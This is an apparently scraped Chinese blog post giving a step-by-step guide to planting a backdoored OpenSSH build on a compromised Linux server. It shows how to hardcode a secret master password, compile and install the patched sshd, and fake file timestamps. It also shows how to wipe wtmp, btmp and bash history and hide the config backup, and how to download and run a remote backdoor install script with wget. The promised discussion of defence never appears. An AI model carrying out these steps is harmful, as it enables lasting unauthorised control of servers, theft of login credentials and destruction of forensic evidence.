linux安装openssh 密码错误,Linux安装openssh的后门补丁
相對于Windows操作系統,Linux操作系統的密碼較難獲取。而很多Linux服務器都配置了Openssh服務,在獲取root權限的情況下,可以通過修改或者更新OpenSSH代碼等方法,截取并保存其SSH登錄賬號密碼,甚至可以留一個隱形的后門,達到長期控制linux服務器的目的。在很多Linux系統被入侵后都會在系統中留后門,使用OpenSSH留后門是入侵者的慣用方式之一,OpenSSh后門比較難于檢測,本文就如何添加OpenSSH后門以及防范后門添加進行探討。
1,補丁下載:
2,解壓后文件修改記錄日志及密碼
# cd openssh-5.9p1
# openssl rand 6 -base64 隨機生成密碼
h7SWmK1V
# vim includes.h
#define ILOG "/tmp/ilog" 修改為空
#define OLOG "/tmp/olog" 修改為空
#define SECRETPW "system" 修改需要登錄的密碼h7SWmK1V
3,安裝相關依賴
#yum install openssl openssl-devel pam-devel -y
4,備份原有配置文件
#cp -p /etc/ssh/sshd_config{,.bak}
5,編譯安裝
#./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5 && make && make install
6,恢復之前文件的創建時間
# cd /etc/ssh/
#touch -r sshd_config.bak ssh_config
7,重載登錄
#service sshd reload
8,刪除記錄
刪除ssh補丁包
# rm -rf openssh-5.9p1*
刪除部分記錄
#echo ""> /var/log/wtmp
#echo ""> /var/log/btmp
#echo ""> ./.bash_history
刪除或者隱藏原本sshd配置文件
#mv sshd_config.bak .sshd_config.bak
腳本安裝:
#wget https://raw.githubusercontent.com/yeohZhou/neiwang/master/sshBackdoorinsatll.sh --no-check
#mv sshBackdoorinsatll.sh/var/tmp/
#cd/var/tmp#chmod+x sshBackdoorinsatll.sh#ssh-V#./sshBackdoorinsatll.shOpenSSH_4.3p2#/etc/init.d/sshd restart
總結
以上是生活随笔為你收集整理的linux安装openssh 密码错误,Linux安装openssh的后门补丁的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux 内核配置mmc,Linux内
- 下一篇: Linux多网卡不通网段,[转载]lin